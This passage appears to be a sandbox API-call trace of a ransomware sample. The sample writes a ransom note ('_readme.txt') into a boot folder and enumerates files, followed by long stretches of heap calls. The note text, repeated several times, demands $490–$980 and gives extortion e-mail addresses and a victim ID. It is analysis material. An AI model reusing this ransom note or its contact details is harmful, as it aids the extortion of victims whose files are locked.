decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9" [0056.313] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5e2e0 [0056.313] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\_readme.txt" (normalized: "c:\\boot\\ru-ru\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c8 [0056.314] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8c0) returned 0x3268798 [0056.314] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x85d) returned 0x32acff0 [0056.314] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32acff0, cbMultiByte=2141, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 1118 [0056.314] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x326aa18 [0056.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32acff0 | out: hHeap=0x660000) returned 1 [0056.314] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.314] lstrlenA (lpString="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7cpJN3gq4f\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nrestoredatahelp@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\ngorentos@bitmessage.ch\r\n\r\nYour personal ID:\r\n0181jYgs9f6sx9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9") returned 1117 [0056.314] WriteFile (in: hFile=0x5c8, lpBuffer=0x326aa18*, nNumberOfBytesToWrite=0x45d, lpNumberOfBytesWritten=0x9f4fb64, lpOverlapped=0x0 | out: lpBuffer=0x326aa18*, lpNumberOfBytesWritten=0x9f4fb64*=0x45d, lpOverlapped=0x0) returned 1 [0056.315] CloseHandle (hObject=0x5c8) returned 1 [0056.315] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0056.315] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5e2e0 | out: hHeap=0x660000) returned 1 [0056.315] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c82710 | out: hHeap=0x660000) returned 1 [0056.315] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5d1d0 | out: hHeap=0x660000) returned 1 [0056.315] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.315] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec504f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec504f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x68d798 [0056.315] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.315] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1ec504f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec504f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0056.315] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0056.315] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec504f0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec504f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec504f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0056.315] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1ec504f0, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1ec504f0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1ec504f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0056.315] FindClose (in: hFindFile=0x68d798 | out: hFindFile=0x68d798) returned 1 [0056.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328eef0 | out: hHeap=0x660000) returned 1 [0056.316] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328eef0 [0056.316] PeekMessageW (in: lpMsg=0x9f4fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9f4fb74) returned 0 [0056.316] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.316] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.316] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.316] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.316] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.316] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.316] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.316] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.316] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.316] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.316] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.316] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.316] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.316] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.316] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.316] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.317] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.317] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.317] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.317] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.317] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.317] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.317] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.317] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.317] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.317] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.317] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.317] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.317] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.317] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.317] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.317] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.317] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.317] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.318] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.318] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.318] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.318] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.318] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.318] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.318] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.318] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.318] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.318] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.318] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.318] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.318] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.318] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.318] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.318] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.318] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.318] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.318] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.318] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.318] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.318] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.318] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.318] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.318] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.318] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.318] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.318] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.318] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.318] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.318] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.318] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.318] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.318] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc2e) returned 0x322cda8 [0056.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x860) returned 0x3268798 [0056.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0056.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc46) returned 0x322cda8 [0056.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x322cda8 | out: hHeap=0x660000) returned 1 [0056.319] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.319] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x840) returned 0x9c5da58 [0056.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x820) returned 0x9c5da58 [0056.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.320] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 [0056.320] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c5da58 | out: hHeap=0x660000) returned 1 [0056.321] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328ec20 | out: hHeap=0x660000) returned 1 [0056.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328ec20 [0056.321] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x830) returned 0x9c5da58 